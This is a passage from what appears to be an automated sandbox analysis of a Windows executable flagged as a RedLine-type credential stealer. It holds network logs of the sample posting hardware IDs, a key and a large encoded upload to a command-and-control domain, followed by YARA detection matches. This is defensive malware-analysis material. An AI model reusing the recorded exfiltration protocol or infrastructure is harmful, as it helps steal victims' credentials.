{"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d03395ff0c4338-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 17:02:06 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-02 17:02:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	188.114.97.3	443	3696	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 17:02:07 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5436 Host: stationacutwo.shop
2024-07-02 17:02:07 UTC	5436	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 37 39 46 30 35 39 31 38 36 34 45 41 31 30 46 35 32 37 32 30 36 33 42 43 39 41 34 43 43 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5879F0591864EA10F5272063BC9A4CC2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-07-02 17:02:07 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 17:02:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jnu74q1q7euqas37cus5kj8o2n; expires=Sat, 26-Oct-2024 10:48:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wzS%2Bmuz%2FCig33tEXxEKYpMmR7dSUImu0t46zIlR0IZs2zEhPpIjnHWLES2XPju%2B2cEUqg1OeRE7tNz7VbMr2%2F4%2Ba7lDvKQCSdYEf%2F64X35RZD36VHLlhyah%2FjiNQ6Pf15aORwmQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d0339f6dd4437e-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 17:02:07 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-02 17:02:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	188.114.97.3	443	3696	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 17:02:08 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1256 Host: stationacutwo.shop
2024-07-02 17:02:08 UTC	1256	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 37 39 46 30 35 39 31 38 36 34 45 41 31 30 46 35 32 37 32 30 36 33 42 43 39 41 34 43 43 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5879F0591864EA10F5272063BC9A4CC2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-07-02 17:02:08 UTC	800	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 17:02:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s9bl4jfg2mu98slfnqi0iskmv2; expires=Sat, 26-Oct-2024 10:48:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yqm2QI31dgtT280HJQfdUWUU5qMpVuU0h7WLNW2XTKxnAZP2OAl5Hw9jydd%2F7ygqcRm4Os6fbyXPcmixm9hgWgwX4aH5tsl4qKT75BjpupD66jxx7bu1fVdSUuSvkQO0yS3%2B9QE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d033a5fde58c8d-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 17:02:08 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-02 17:02:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	188.114.97.3	443	3696	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 17:02:09 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 574980 Host: stationacutwo.shop
2024-07-02 17:02:09 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 37 39 46 30 35 39 31 38 36 34 45 41 31 30 46 35 32 37 32 30 36 33 42 43 39 41 34 43 43 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5879F0591864EA10F5272063BC9A4CC2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-07-02 17:02:09 UTC	15331	OUT	Data Raw: 9e 84 05 53 1e 87 bd 02 6c 33 05 f0 bb f0 5a df 61 1c 92 d1 db 0a af 31 86 ce 4b d2 f0 bb c9 2e 22 e0 8c 3a 16 c6 71 b1 6b d6 e8 50 c5 ed ab fb b9 6e db 41 6a 90 e3 ff 5b a5 a4 f9 00 dd 7e 57 70 07 0d ea c9 e4 9e 20 e0 b5 85 83 05 68 0a ce 69 61 e1 25 66 ec 9e b4 52 01 88 f7 e7 82 51 ea 31 06 6f c1 d0 b6 cd 12 62 1c 92 ea 15 06 97 12 d3 1c dc 70 a0 41 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7 c2 12 cb 9a 33 ef 96 80 df 1e 9a 36 3a 50 10 fc e8 47 b3 37 8f 8c 04 aa c4 af dd 3c 9a 87 a2 d6 47 47 3c 57 7f be d5 10 d2 86 db Data Ascii: Sl3Za1K.":qkPnAj[~Wp hia%fRQ1obpA`P"M_R^\(z8oZ+Za*1!6Spl5sj\\|H36:PG7<GG<W
2024-07-02 17:02:09 UTC	15331	OUT	Data Raw: bd 9a ce 68 ff b5 06 cd 21 2c 6f 14 94 c2 be a8 b7 ca 6d 12 70 e4 a6 c2 58 fe 44 44 0b 45 22 d8 4b 82 76 ea 01 ae e3 05 82 8a 94 19 06 7b a5 22 4b 4c d7 32 1f 0d 9b 8a d1 2a e3 d3 cf 2a d7 25 43 04 88 7b ba df e5 37 d1 4d a6 60 a1 18 2d d5 87 78 b9 c2 17 1a b3 1f 0a 45 c6 76 4f 1a 02 1f 24 fa 4d 9d 52 04 62 82 4a ae 29 c5 e8 a0 7b 06 c3 85 66 bf 18 4d 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee 60 ee 3e 58 bc 14 93 95 a7 76 27 9e 4d 6a 3d 48 be c0 68 58 38 c1 6e d4 cd 93 08 63 a6 d6 94 7d 28 0d c5 f8 68 f6 22 bc 6c 5e d8 Data Ascii: h!,ompXDDE"Kv{"KL2**%C{7M`-xEvO$MRbJ){fMvK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c`>Xv'Mj=HhX8nc}(h"l^
2024-07-02 17:02:09 UTC	15331	OUT	Data Raw: 2d 43 8a be fa ed 49 89 ed d2 57 7b ea c5 a5 67 57 c3 80 6d 0c 6a 8e 6d d6 9a 57 02 30 d4 df 77 3f 1e 79 c5 74 e9 0b ce 40 1d 68 99 6f de f7 68 9d 70 35 5c 29 35 c5 db 3a 18 e5 bf bb 36 f5 17 41 37 45 50 fc 45 ec 80 2f 38 63 f3 5f d1 e4 e8 f5 8e 3a a3 9c a5 89 66 ab ed a5 a2 8f 4e bc e4 68 f9 dd 25 35 9f b8 66 3b e7 c3 af 17 de fb ef 65 c8 0e 0b de a1 b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a ec d5 e6 bb 3c c5 8b e7 68 7e 65 ad fd e4 4f bb 67 78 fa 2d 7f aa 1e 74 7b f5 c1 56 8d 62 51 da 3c 56 ec a8 fd c9 7f 89 ed d5 e1 Data Ascii: -CIW{gWmjmW0w?yt@hohp5\)5:6A7EPE/8c_:fNh%5f;e}@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8<h~eOgx-t{VbQ<V
2024-07-02 17:02:09 UTC	15331	OUT	Data Raw: eb 34 c7 47 ca 68 bc cd c1 ab 9c 9c b3 e0 35 34 f2 42 75 a9 36 b9 aa 2c 09 1d 7b 40 75 c4 82 63 13 bc df d9 45 5e 6c f7 ce 9e 56 a6 db 43 6e b3 66 65 de 93 bf c7 4a 32 e0 55 81 9b d5 19 ae b9 10 6f 19 d1 8b 30 98 e3 82 3f cc 18 dc dc 8b 10 02 46 13 b9 50 1d 11 e8 bd 3e c3 47 1c 1c 57 b3 d9 81 3c 0f a5 37 44 fd af 4c da 22 83 02 6e 7b 4d 3a 15 dd 47 82 0f f7 32 9b 78 c0 10 c5 71 d4 5a d5 05 23 bc f3 ee fd a7 c3 ef b5 4d fd b5 24 1d ee 1f 91 b4 b9 a7 f2 5e d9 9c 94 ee 87 fe fb 80 d6 b4 70 32 61 05 62 f8 27 52 f9 fe ff af e4 86 24 28 1d e3 81 f3 c0 e2 9f 81 4b 32 8b 6f 84 18 55 e5 94 94 16 64 31 fc 79 b1 e4 51 11 0f 07 e1 3c d5 fe 89 b3 23 9c f0 5d a2 2c 2b 41 10 f1 67 7b 3a 50 d1 7e 86 24 d6 1a a4 06 6e 45 69 53 0f 7d dc f7 90 f5 e0 26 e7 bc 0e a1 fd 4c f4 Data Ascii: 4Gh54Bu6,{@ucE^lVCnfeJ2Uo0?FP>GW<7DL"n{M:G2xqZ#M$^p2ab'R$(K2oUd1yQ<#],+Ag{:P~$nEiS}&L
2024-07-02 17:02:09 UTC	15331	OUT	Data Raw: e4 d2 da 90 8d 5b c5 fc 3a b3 08 39 a7 3a 09 e1 a6 72 64 85 45 e3 e7 e5 1a 6c b5 7c a1 8b 3d a1 40 ee 59 54 21 a9 d1 c0 c0 57 e0 c7 c1 96 40 aa ba 72 ab b7 76 6d 02 14 ef bd ed f3 2c 4d 0b 19 58 b0 fd 6a 47 ad 88 b5 0c 23 00 b1 ab d6 19 a5 1c ae cf b1 ed e2 98 d2 2f 84 01 41 37 c6 ee f1 f5 dc 3f 72 77 6b d2 a9 5e b1 bb c8 d9 a3 2d 59 a8 44 25 da 50 cc 7e bc ef f2 47 23 9b 6f fa 9e 05 82 86 1a 4d 61 5b 7c 61 a7 db f8 8a f3 0d 67 1d 63 7b 2b b6 1f fc 08 32 fc 21 74 ce 59 f6 57 5d e2 33 e8 77 09 36 b7 32 11 43 00 0f 86 0a e8 ad 6d 83 f2 b6 dc 1f ae 90 70 36 a2 77 10 b7 7e 8b 5e 70 54 e7 f0 96 3e ee 10 c7 1f 35 b1 75 94 5e 64 66 40 32 ac 92 64 44 ef 53 53 9f d5 93 c7 84 c0 3e 3f aa 43 fa a7 98 e7 41 fe 55 8c 1c 21 e6 f8 7d 1e b0 b0 d3 ce 6e 6b df 45 a1 1b 89 Data Ascii: [:9:rdEl\|=@YT!W@rvm,MXjG#/A7?rwk^-YD%P~G#oMa[\|agc{+2!tYW]3w62Cmp6w~^pT>5u^df@2dDSS>?CAU!}nkE
2024-07-02 17:02:09 UTC	15331	OUT	Data Raw: 59 4e 91 13 25 ef ea 7a ce 2a f9 ff da 2a 7e e2 64 11 f0 f5 ce e1 bc b8 2a 8f 37 fb da 02 e3 74 fb be 21 f1 ee dc b7 aa ac 61 89 26 d8 85 53 25 c8 48 41 90 87 0e ac 2e cd 48 4a e3 04 21 37 50 e7 36 53 90 ba 9b 0d 9b 28 77 b8 55 f5 50 f4 c7 45 40 58 f5 0e 02 b7 70 32 b3 99 13 1c a8 92 ff 6d d9 2b 1b 1f bd 64 c0 b5 3b cb 43 b2 5e a6 fe f5 af 8f 1f 21 7f ec 8c cf 06 12 c4 7b 6f e0 16 71 c8 f2 5b 8e 69 ee 73 25 f1 d5 78 45 2b 5a 12 63 fd 67 26 3e f2 c9 66 68 0a 22 f9 36 0b b3 39 6e 4b 1a 4a 28 d0 46 c2 cd 07 ac 48 13 74 56 ee ac 96 7e 9b 8f 66 fd 8c 12 bd 89 06 b8 cd d5 9f 69 2c 9f 21 04 fd da e8 d2 e3 9c 7b 81 4c 76 80 73 f5 8f 6b 51 0e bd 60 b1 46 08 5c dd 18 2d f9 58 23 3d 5a a9 d4 b7 59 09 53 1f 03 10 5d 4a 7f c7 01 3c ca 3e 4a e7 3c 85 f2 ee 92 9f 19 7c Data Ascii: YN%z*~d7t!a&S%HA.HJ!7P6S(wUPE@Xp2m+d;C^!{oq[is%xE+Zcg&>fh"69nKJ(FHtV~fi,!{LvskQ`F\-X#=ZYS]J<>J<\|
2024-07-02 17:02:09 UTC	15331	OUT	Data Raw: a2 1e 08 98 83 d7 0d e7 af 85 c2 84 e7 21 fa fc 89 8b 43 15 0e a3 79 e9 04 11 4d 86 42 ba e2 6b 72 82 a7 29 6c 5a 0f 97 49 75 51 b9 ef a6 6d 2e 86 61 60 02 d9 99 ef 57 fb 7f db d3 5a f4 32 7f 24 6c 02 9e 03 73 cf 51 b0 ec fc 99 f1 17 58 98 0f c7 bb 28 8d ed 1c 9f 98 73 65 db 0f 44 1a 10 b5 51 66 62 7d 45 37 ec 6b 5d 94 d2 e7 c6 53 cc 2e 28 5e 52 ca 30 98 53 6f 73 8d b5 af 21 ca 87 ea 5d 12 8c 27 f3 03 5e 81 f5 d8 aa a3 ae f5 9d 66 4d e3 fb 43 1c a5 02 90 98 55 be a2 5e fa 03 4f 7f 12 f6 fa be 45 6f 28 19 d9 9d 1a d7 52 c3 7b 22 1a 68 36 9f 06 bf 95 af ea 97 78 72 5e 94 3d 38 3e 2c d1 ef b4 e9 fc 2f e2 09 a5 70 ff 54 fd 55 01 52 a0 47 0c 63 d8 28 bf a7 24 e0 9a d7 d2 e6 97 44 3c a9 d6 54 2e fd e7 75 da 59 bd a1 66 da 1c 62 a9 00 e6 75 53 75 c7 07 ba 63 da Data Ascii: !CyMBkr)lZIuQm.a`WZ2$lsQX(seDQfb}E7k]S.(^R0Sos!]'^fMCU^OEo(R{"h6xr^=8>,/pTURGc($D<T.uYfbuSuc
2024-07-02 17:02:09 UTC	15331	OUT	Data Raw: b2 a0 ea f2 7e 00 ff cb 0b a2 0d 26 dd 2b 73 d6 5e 26 b6 90 b5 b1 5c 07 d4 77 4d 1e 81 ed 66 0e 33 52 e0 ea 6e 53 79 88 14 0f 07 21 cb 84 33 2c dd 47 93 e1 d7 64 5e 8c 5d 90 c4 12 a7 f8 3a 7e 25 f8 2d 08 b7 12 10 91 6e 7e 1e f3 0f 54 b8 73 7b 2a d4 3b 1d 3a 96 20 cb 6c 5c a7 89 e0 77 c9 c2 ef 00 ca 6d 28 29 76 eb e0 f3 10 22 fe 06 e3 62 b2 ed 6c 77 d1 b0 1e 5b 46 58 c8 8d 7b f0 da 68 81 70 94 4a 27 e0 4e cc 85 1f 25 c0 5a 86 bf e6 98 9c 57 3a 6d 0d d1 12 a2 42 90 f2 46 a0 0e 55 98 20 42 27 ec bb 54 ff 00 e2 87 f8 f8 05 25 be d5 1c 78 14 2b ff f4 13 38 d0 fb b5 29 1f 65 d6 10 2c c1 79 03 d2 9f 04 ab 22 68 c1 ae 31 8d 2f 9e 0c aa 3b e4 b7 07 f0 cd 26 e5 91 f9 f9 66 b7 e8 51 61 82 c2 4c ed 65 61 be 6f d5 9f e5 19 da fc 74 2a db a5 8a c8 24 52 d2 9e 04 31 f1 Data Ascii: ~&+s^&\wMf3RnSy!3,Gd^]:~%-n~Ts{;: l\wm()v"blw[FX{hpJ'N%ZW:mBFU B'T%x+8)e,y"h1/;&fQaLeaot$R1
2024-07-02 17:02:09 UTC	15331	OUT	Data Raw: 80 7d b4 45 ba ff 3f 40 99 7d ae f5 a8 d0 18 a4 9b 33 36 f4 f6 3f dd 3e 0e 1b df 05 75 0b b2 f9 e7 aa ef 1f be 25 41 d8 6e 14 c0 ed 85 c8 fc 50 c6 9e e8 a1 d8 7c 23 3b 14 0c 87 d9 ee de 66 e9 cf 59 b7 7e 06 d7 87 f0 72 a7 b0 ec 82 ec a3 fb a5 99 b7 1a d4 6c 4e 23 6b 1b e3 be bf f4 cd f1 52 00 7b f0 9c 80 c8 aa c5 18 a9 93 4e be dc 0f cd ae 0e b2 b4 a2 09 0b 7e b2 38 e7 f1 57 f3 db 00 3f 81 f8 6b 84 18 84 0b c6 6d fd 7a 76 69 34 49 84 e2 0b 99 3b e6 67 20 64 1e d6 8b ee 10 6c ca d2 3a 04 0e 5b a7 d7 d6 18 ad 06 a6 35 a1 4d 4b 31 fc f4 46 1e 8a b9 49 31 f7 3c cb 5a 4f fa 74 3d 8d 17 4c 6e a0 67 ec 40 d3 2f 61 8d 05 ca eb a4 5a d9 74 c5 fa 40 59 91 31 9d 37 ca 89 e1 de 52 cc 66 95 79 6f 57 c4 37 fd 56 a5 87 e2 39 0f ae f1 5b 00 76 2e 8a 10 bb a0 19 4d 03 34 Data Ascii: }E?@}36?>u%AnP\|#;fY~rlN#kR{N~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZt@Y17RfyoW7V9[v.M4
2024-07-02 17:02:11 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 17:02:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mpv4e7mohbe329f9oimod3crlp; expires=Sat, 26-Oct-2024 10:48:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLqcHi6%2BVNTvEt39BLawKC58bL0Wxqbz7f4Szq7pTS3FZbetBKP5QLI0sJt05XtnFjVVozXbuEOWMTEFT95heyRjvMjxQ5CoT%2FzWCltD%2BNjoxGt%2BCc3LVcJM3Q%2B9XdUVTYaUuXI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d033aea99980cd-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	188.114.97.3	443	3696	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 17:02:11 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: stationacutwo.shop
2024-07-02 17:02:11 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 6b 65 79 26 6a 3d 26 68 77 69 64 3d 35 38 37 39 46 30 35 39 31 38 36 34 45 41 31 30 46 35 32 37 32 30 36 33 42 43 39 41 34 43 43 32 Data Ascii: act=get_message&ver=4.0&lid=P6Mk0M--key&j=&hwid=5879F0591864EA10F5272063BC9A4CC2
2024-07-02 17:02:12 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 17:02:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tveho271injhp6ma8r8aa34snp; expires=Sat, 26-Oct-2024 10:48:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4nVzO2A1Ns3Qt6TYiqMNxKDAvKtW%2BL8GX6H%2BgxrzgGz%2FTPsqIz%2BvKAewEWGPK7sSR2x%2Be4fnS9ECslqW%2FCsulla0Ts7RC1tNBigt1U1Xy8yh0ew%2B6viFI9vWtbM97i3uW9mIhc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d033bb1f288cc8-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 17:02:12 UTC	54	IN	Data Raw: 33 30 0d 0a 4b 71 42 6f 37 4e 78 76 6c 33 55 62 33 76 37 5a 30 6c 43 66 67 51 56 2b 67 7a 6f 64 2f 76 78 67 41 4a 68 2b 72 6d 36 64 49 42 42 78 2f 51 3d 3d 0d 0a Data Ascii: 30KqBo7Nxvl3Ub3v7Z0lCfgQV+gzod/vxgAJh+rm6dIBBx/Q==
2024-07-02 17:02:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	13:01:52
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	297'472 bytes
MD5 hash:	2F694C5080F96479F2BEA3F4D07200F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2032358738.0000000002A61000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1724865507.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1762484682.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1776086963.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1765200814.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1764065027.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1762684791.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1765856289.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1764944431.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1749261230.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 